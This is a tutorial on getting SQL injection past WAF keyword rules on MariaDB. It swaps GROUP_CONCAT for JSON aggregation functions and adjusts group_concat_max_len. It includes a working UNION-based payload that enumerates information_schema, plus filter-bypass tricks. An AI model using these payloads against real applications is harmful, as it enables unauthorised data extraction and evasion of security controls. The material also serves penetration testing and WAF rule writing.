Group Concat Alternative

Context

This article explains how to evade Web Application Firewall (WAF) signatures that key on the GROUP_CONCAT function by using alternative aggregation functions available in MariaDB during SQL injection. The reader is expected to have foundational knowledge of SQL query structure, database functions, and how WAFs inspect requests sent to MariaDB-backed web applications.

Theory

WAF Evasion Techniques

Web Application Firewalls are designed to detect and block malicious requests, but most rely on signature or pattern matching against known keywords and query shapes, and they do not recognise a semantically equivalent query written with different tokens. The evasion techniques described here rest on finding gaps in those rules and crafting SQL that returns the same data without matching any of them.

MariaDB Specific SQL Injection Methods

MariaDB shares most of its syntax with MySQL, but it has its own parser and its own set of functions. WAF rulesets are commonly written against the MySQL dialect, so features that MariaDB added on its own, such as the JSON aggregation functions introduced in 10.5, are often missing from their signatures. Techniques tailored to MariaDB use these dialect-specific functions and parsing nuances to build payloads that the standard rules were never written to catch.

Alternative Aggregation Functions

GROUP_CONCAT is the usual way to pull many rows back through a single injected column, which is exactly why its name appears in most WAF signature sets. MariaDB 10.5 added JSON_ARRAYAGG and JSON_OBJECTAGG, which aggregate a column (or a key/value pair) into a JSON array or object. The goal is the same concatenated data, retrieved with a function name the WAF rules do not list.

JSON_ARRAYAGG Function

JSON_ARRAYAGG (MariaDB 10.5.0 and later) returns the aggregated values as a JSON array, for example ["users","orders"]. Because the literal token GROUP_CONCAT never appears in the request, rules that only look for that keyword do not fire; rules that match the surrounding UNION SELECT or information_schema references still can, so the function is a substitution, not a complete bypass. Two practical caveats: the values come back JSON-quoted with embedded quotes and backslashes escaped, so decode the array rather than splitting on commas; and the result length is bounded by the same group_concat_max_len variable that limits GROUP_CONCAT, so switching functions does not avoid truncation. MySQL 5.7.22 and later also have JSON_ARRAYAGG, which means some rulesets written for MySQL may already cover it.

Symbol Bypass Techniques

Symbol bypassing is the complementary trick: keeping the same function but changing the characters around it, such as comment sequences in place of whitespace, alternative whitespace characters, or equivalent operators and function spellings, so that the request no longer matches a rule written for one exact spelling. This works against filters that detect specific keywords or byte sequences rather than parsing the query.

Practice

Using JSON_ARRAYAGG for WAF Bypass

To substitute JSON_ARRAYAGG for GROUP_CONCAT, follow these steps:

  • Confirm that the target server runs MariaDB 10.5.0 or later (or MySQL 5.7.22 or later); on older versions the function does not exist and the query errors out, which is itself a useful fingerprint.

  • Aggregate the target column with:

    SELECT JSON_ARRAYAGG(column_name) FROM table_name;
    

    This returns every value of column_name in a single row as a JSON array, with no GROUP_CONCAT token in the request for a keyword rule to match. Decode the JSON on the client side to recover the individual values.
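The steps above put together, as an added example that is not code from the original article. It runs the version check and the JSON_ARRAYAGG query against information_schema, which every MariaDB installation has, next to the GROUP_CONCAT form it replaces, and then shows the same aggregation inside a UNION-based injection. It assumes MariaDB 10.5 or later; the `products` and `users` tables and the `id` parameter are hypothetical. Step 3 goes beyond the article's own example by using JSON_OBJECTAGG to carry two fields per row.

```sql
-- Added example, not code from the original article. Assumes MariaDB 10.5 or later
-- (JSON_ARRAYAGG and JSON_OBJECTAGG were introduced in 10.5.0) and an account that
-- can read information_schema. The tables `products` and `users` and the `id`
-- parameter are hypothetical.

-- Step 0: confirm the server version before relying on JSON_ARRAYAGG.
SELECT VERSION();

-- Step 1: the form most WAF signatures are written for.
SELECT GROUP_CONCAT(table_name SEPARATOR ',')
FROM information_schema.tables
WHERE table_schema = DATABASE();

-- Step 2: the same rows aggregated into a JSON array. The token GROUP_CONCAT
-- never appears in the request. The output is JSON, e.g. ["orders","products"],
-- with strings quoted and any embedded quotes or backslashes escaped, so decode
-- it as JSON rather than splitting on commas.
SELECT JSON_ARRAYAGG(table_name)
FROM information_schema.tables
WHERE table_schema = DATABASE();

-- Step 3 (beyond the article's example): two fields per round trip, as a JSON
-- object mapping column name to data type for one (hypothetical) table.
SELECT JSON_OBJECTAGG(column_name, data_type)
FROM information_schema.columns
WHERE table_schema = DATABASE() AND table_name = 'users';

-- Step 4: the aggregation inside a UNION-based injection. Hypothetical vulnerable
-- statement:  SELECT name, price FROM products WHERE id = <input>
-- With <input> set to everything after "id = " below, the original query returns
-- no rows and the UNION adds one row whose second column holds the JSON array.
-- The trailing "-- -" comments out whatever followed the injection point.
SELECT name, price FROM products WHERE id = -1
UNION SELECT 1, JSON_ARRAYAGG(table_name)
FROM information_schema.tables WHERE table_schema = DATABASE()-- -
```

Step 4 only removes the GROUP_CONCAT token; UNION SELECT and information_schema are still present, so a ruleset that matches those needs the symbol-bypass techniques from the Theory section on top of the function substitution.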

Outcome

Using JSON_ARRAYAGG removes the GROUP_CONCAT keyword from the payload, so rules that match only that token no longer block the request, and the concatenated data still comes back in one row. Rules that match other parts of the query are unaffected and may still raise an alert.

Adjusting group_concat_max_len

group_concat_max_len is a server-side variable, not a WAF setting: it caps the length in bytes of a GROUP_CONCAT (and JSON_ARRAYAGG) result, and anything beyond the cap is silently dropped with warning 1260, "Row N was cut by GROUP_CONCAT()". The default is 1048576 bytes on MariaDB 10.2.4 and later but only 1024 on older MariaDB releases and on MySQL, which is small enough to truncate a table listing. When the result is coming back incomplete, raise the limit for the current connection:

  • Increase the session limit (no SUPER privilege is required for the SESSION scope):

    SET SESSION group_concat_max_len = 1000000;
    

    This applies only to the connection that issued it, so in an injection context it must run on the same connection as the query that follows, which in practice requires a stacked-query injection point. Where that is not available, page through the rows with LIMIT and OFFSET instead of aggregating them.

  • Execute the GROUP_CONCAT query on that connection:

    SELECT GROUP_CONCAT(column_name) FROM table_name;
    

    The full concatenated result is returned up to the new limit.
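What group_concat_max_len actually limits, as an added example that is not code from the original article. It builds a throwaway table of 2000 rows from MariaDB's seq_1_to_N virtual tables (the SEQUENCE storage engine, loaded by default since 10.1; this is an assumption about the target server), forces the old 1024-byte default to make the truncation visible, shows that JSON_ARRAYAGG is cut at the same point, then raises the limit and re-runs. JSON_ARRAYAGG requires MariaDB 10.5 or later. Everything runs in one session.

```sql
-- Added example, not code from the original article. Constructed data: 2000 rows
-- of 32-character MD5 strings generated from the seq_1_to_2000 virtual table
-- (MariaDB SEQUENCE engine, assumed to be loaded). JSON_ARRAYAGG needs MariaDB 10.5+.
-- All statements run on the same connection; SET SESSION does not affect others.

CREATE TEMPORARY TABLE t_demo (val CHAR(32) NOT NULL);
INSERT INTO t_demo SELECT MD5(seq) FROM seq_1_to_2000;

-- Current session limit: 1048576 on MariaDB 10.2.4+, 1024 on older MariaDB and on MySQL.
SELECT @@SESSION.group_concat_max_len;

-- Force the old default so the truncation is visible regardless of server version.
SET SESSION group_concat_max_len = 1024;

-- Both aggregates are cut at 1024 bytes: JSON_ARRAYAGG shares the same limit and is
-- therefore not a workaround for truncation. The server raises warning 1260
-- ("Row N was cut by GROUP_CONCAT()") when it truncates.
SELECT LENGTH(GROUP_CONCAT(val)) AS gc_len,
       LENGTH(JSON_ARRAYAGG(val)) AS ja_len
FROM t_demo;
SHOW WARNINGS;

-- Raise the limit for this connection only (no SUPER privilege needed) and re-run:
-- gc_len now covers all 2000 values plus separators, and ja_len is larger still
-- because of the JSON quotes and brackets.
SET SESSION group_concat_max_len = 1000000;
SELECT LENGTH(GROUP_CONCAT(val)) AS gc_len,
       LENGTH(JSON_ARRAYAGG(val)) AS ja_len
FROM t_demo;

-- When SET SESSION cannot be issued through the injection point (no stacked
-- queries), page through the rows one at a time instead of aggregating them.
SELECT val FROM t_demo ORDER BY val LIMIT 1 OFFSET 0;

DROP TEMPORARY TABLE t_demo;
```

The paging query at the end is the fallback that needs no session change: increment OFFSET once per request until no row comes back.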

Outcome

Raising group_concat_max_len stops the database from truncating long aggregated results, so a table or column listing that was coming back cut off at 1024 bytes arrives whole in a single query. It does nothing to the WAF: the same request is inspected either way, and the variable is useful only when the injection point already allows the SET statement to run on the same connection.

Tools

  • MariaDB Client
  • SQLMap

With these techniques, practitioners can swap less common MariaDB functions and session settings into their payloads to get past keyword-based WAF rules and avoid server-side truncation, keeping in mind that each substitution removes one signature and that the rest of the payload still has to pass the remaining rules.
